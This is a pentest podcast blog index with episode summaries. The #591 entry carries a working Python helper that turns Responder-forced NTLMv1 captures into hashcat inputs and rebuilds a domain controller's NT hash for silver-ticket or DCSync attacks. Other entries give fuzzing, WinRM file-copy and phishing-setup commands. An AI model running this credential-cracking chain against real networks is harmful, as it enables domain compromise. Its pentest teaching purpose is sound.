Blog
7MS #592: 7 Steps to Recover Your Hacked Facebook Account
Today we're talking about 7 steps you can take to (hopefully) reclaim a hacked Facebook account. The key steps are:
1. Ask Facebook for help (good luck with that)
2. Put out an SOS on your socials
3. Flag down the FBI
4. Call the cops!
5. Grumble to your attorney general
6. Have patience
7. Lock it down (once you get the account back)!
Also, I have to say that this article was a fantastic resource in helping me [...]
7MS #591: Tales of Pentest Pwnage – Part 52
Today we talk about an awesome path to internal network pentest pwnage using downgraded authentication from a domain controller, a tool called ntlmv1-multi, and a boatload of cloud-cracking power on the cheap from vast.ai. Here are my chicken-scratch notes for how to take the downgraded authentication hash capture (using Responder.py -I eth0 --lm) and eventually tweeze out the NTLM hash of the domain controller. Let's [...]
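To show why a downgraded NTLMv1 capture is worth so much, here is an added Python example (not code from the episode or from ntlmv1-multi) that does the bookkeeping around the crack: it parses a Responder-style capture line, works out which 8 bytes the DES keys actually encrypted (the fixed 1122334455667788 challenge, or the MD5-derived value when NTLMv1-ESS was in play), emits the two hashcat mode-14000 inputs, and reassembles the NT hash from cracked keys. The NT hash of "password" (8846f7eaee8fb117ad06bdd830b7586c) and the capture lines are constructed sample data; the DES brute force of the third, mostly-zero key is left to hashcat/ntlmv1-multi.

```python
import hashlib

# Responder's fixed server challenge when it forces NTLMv1: a known plaintext
# for all three DES blocks, which is what makes the crack cheap.
RESPONDER_CHALLENGE = "1122334455667788"

# Constructed sample captures in Responder's NTLMv1 format:
#   user::DOMAIN:LMRESP(24 bytes):NTRESP(24 bytes):CHALLENGE(8 bytes), all hex.
SAMPLE_PLAIN = "jdoe::CORP:" + "a1" * 24 + ":" + "b2" * 8 + "c3" * 8 + "d4" * 8 + ":" + RESPONDER_CHALLENGE
# Same layout but with NTLMv1-ESS: LM field = 8-byte client nonce + 16 zero bytes.
SAMPLE_ESS = "DC01$::CORP:" + "0102030405060708" + "00" * 16 + ":" + "b2" * 8 + "c3" * 8 + "d4" * 8 + ":" + RESPONDER_CHALLENGE


def parse_ntlmv1(line):
    """Split one capture line into user/domain and the three byte fields."""
    parts = line.strip().split(":")
    if len(parts) != 6:
        raise ValueError("expected user::DOMAIN:LM:NT:CHALLENGE")
    user, _, domain, lm, nt, chal = parts
    lm_b, nt_b, chal_b = bytes.fromhex(lm), bytes.fromhex(nt), bytes.fromhex(chal)
    if len(lm_b) != 24 or len(nt_b) != 24 or len(chal_b) != 8:
        raise ValueError("NTLMv1 responses are 24 bytes, challenge is 8 bytes")
    return {"user": user, "domain": domain, "lm": lm_b, "nt": nt_b, "challenge": chal_b}


def effective_challenge(lm, challenge):
    """The 8 bytes each DES key encrypted.

    Plain NTLMv1 encrypts the server challenge. With ESS the client sends its
    own nonce in the LM field (nonce + 16 zero bytes) and the DES plaintext is
    MD5(server_challenge || client_nonce)[:8], so the crack must use that.
    """
    if lm[8:] == b"\x00" * 16:
        return hashlib.md5(challenge + lm[:8]).digest()[:8]
    return challenge


def hashcat_14000(nt, pt):
    """hashcat -m 14000 lines (ciphertext:plaintext) for DES keys 1 and 2.

    NTLMv1 zero-pads the 16-byte NT hash to 21 bytes and uses it as three
    7-byte DES keys over the same plaintext. Key 3 is 2 real bytes + 5 zeros
    (65,536 candidates), so it is brute-forced outright rather than fed here.
    """
    return [f"{nt[0:8].hex()}:{pt.hex()}", f"{nt[8:16].hex()}:{pt.hex()}"]


def crack_inputs(line):
    """Everything needed to hand a capture to the cracker."""
    f = parse_ntlmv1(line)
    pt = effective_challenge(f["lm"], f["challenge"])
    return {"account": f"{f['domain']}\\{f['user']}", "plaintext": pt.hex(),
            "hashcat": hashcat_14000(f["nt"], pt),
            "key3_ciphertext": f["nt"][16:24].hex()}


def des_key_from_7(k7):
    """Expand a 7-byte DES key into the 8-byte odd-parity form hashcat prints."""
    bits = int.from_bytes(k7, "big")
    out = bytearray()
    for i in range(8):
        b = ((bits >> (49 - 7 * i)) & 0x7F) << 1
        if bin(b).count("1") % 2 == 0:  # parity bit (LSB) makes the byte odd parity
            b |= 1
        out.append(b)
    return bytes(out)


def des_key_to_7(k8):
    """Drop the parity bits of an 8-byte DES key to get the 7 key bytes back."""
    bits = 0
    for b in k8:
        bits = (bits << 7) | (b >> 1)
    return bits.to_bytes(7, "big")


def recover_nt_hash(k1, k2, k3):
    """Rebuild the 16-byte NT hash from the three cracked 8-byte DES keys."""
    k3_7 = des_key_to_7(k3)
    if k3_7[2:] != b"\x00" * 5:
        raise ValueError("third key must end in five zero bytes; wrong crack?")
    return des_key_to_7(k1) + des_key_to_7(k2) + k3_7[:2]


if __name__ == "__main__":
    for line in (SAMPLE_PLAIN, SAMPLE_ESS):
        print(crack_inputs(line))
    # Round trip with the NT hash of "password" as if hashcat had cracked all three keys.
    nt = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")
    keys = [des_key_from_7(nt[0:7]), des_key_from_7(nt[7:14]), des_key_from_7(nt[14:16] + b"\x00" * 5)]
    print(recover_nt_hash(*keys).hex())
```

The NT hash that comes out is the domain controller's machine-account secret, which is why a single downgraded authentication is enough to go on to things like a silver ticket or DCSync; the expensive part (two full DES key-space searches) is exactly what the cloud GPU rental pays for.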
7MS #590: Hacking Billy Madison – Part 2
Today my pal Paul and I continued hacking Billy Madison (see part one here) and learned some interesting things:
* You can fuzz a URL for a specific file type using a format like this:
  wfuzz -c -z file,/root/Desktop/wordlist.txt --hc 404 http://x.x.x.x/FUZZ.cap
* To rip .cap files apart and make them "pretty" you can use tcpick:
  tcpick -C -yP -r tcp_dump.pcap
  Or tcpflow:
  apt install tcpflow
  tcpflow -r tcp_dump.pcap
* To do port knocking, you can use the [...]
7MS #589: Tales of Pentest Pwnage – Part 51
In today's tale of pentest pwnage we talk about:
* The importance of local admin, and how access to even one server might mean instant, full control over their backup or virtualization infrastructure
* Copying files via WinRM when copying over SMB is blocked (Copy-Item's -FromSession parameter needs PowerShell 5.0 or later):
  $sess = New-PSSession -ComputerName SERVER-I-HAVE-LOCAL-ADMIN-ACCESS-ON -Credential (Get-Credential)
  ...then provide your creds, and then:
  Copy-Item c:\superimportantfile.doc -Destination c:\my-local-hard-drive\superimportantfile.doc -FromSession $sess
* If you come across PowerShell code that crafts a secure string [...]
7MS #588: Becoming a Sysmon Sensei with Amanda Berlin
Today Amanda Berlin from Blumira teaches us how to unlock the power of Sysmon so we can gain insight into the good, bad and ugly things happening on our corporate endpoints! Key takeaways:
* Sysmon turns your Windows logging up to 11, and pairs well with a config file like this one or this one.
* Careful if you are running Sysmon on non-SSD drives - the intense [...]
7MS #587: Hacking Billy Madison
Today my pal Paul from Project7 and I hack the heck out of Billy Madison, a vulnerable virtual machine that is celebrating its 7th anniversary this month!
7MS #586: DIY Pentest Dropbox Tips – Part 8
Today, sadly, might be the last episode of DIY pentest dropbox tips for a while because I found (well, ChatGPT did actually) the missing link to 100% automate a Kali Linux install! Check episode #449 for more info on building your Kali preseed file, but essentially the last line in my file runs a kali.sh script to download/install all the pentest tools I want. [...]
7MS #585: DIY Pentest Dropbox Tips – Part 7
Hey friends, today I'm super excited to share I found the missing link! Specifically, the missing piece that now allows me to create *fully automated* Windows 10 installs that serve as virtual pentest jumpboxes. Here are the high points:
* When your deployment script is finishing and you need the system to reboot and run some final commands, temporarily add your account as an auto-login [...]
7MS #584: Tales of Pentest Pwnage – Part 50
In today's tale of pwnage, we'll talk about how domain trusts can be dangerous because they have...well...trust issues.
7MS #583: Cred-Capturing Phishing with Caddy Server
Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server! Here's a quick set of install commands for Ubuntu:
sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https
curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/gpg.key' | sudo gpg --dearmor -o /usr/share/keyrings/caddy-stable-archive-keyring.gpg
curl -1sLf 'https://dl.cloudsmith.io/public/caddy/stable/debian.deb.txt' | sudo tee /etc/apt/sources.list.d/caddy-stable.list
sudo apt update
sudo apt install caddy -y
Create an empty directory for your new site, and then create [...]
7MS #582: Using Wazuh as a SIEM for Work and Home
Today we had a blast playing with Wazuh as a SIEM you can use for work and/or home. Inspiration for this episode came from Network Chuck. This one-liner will literally get Wazuh installed in about 5 minutes:
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh && sudo bash ./wazuh-install.sh -a
P.S. if you accidentally close your command window before writing down the admin password (like I did), you can [...]
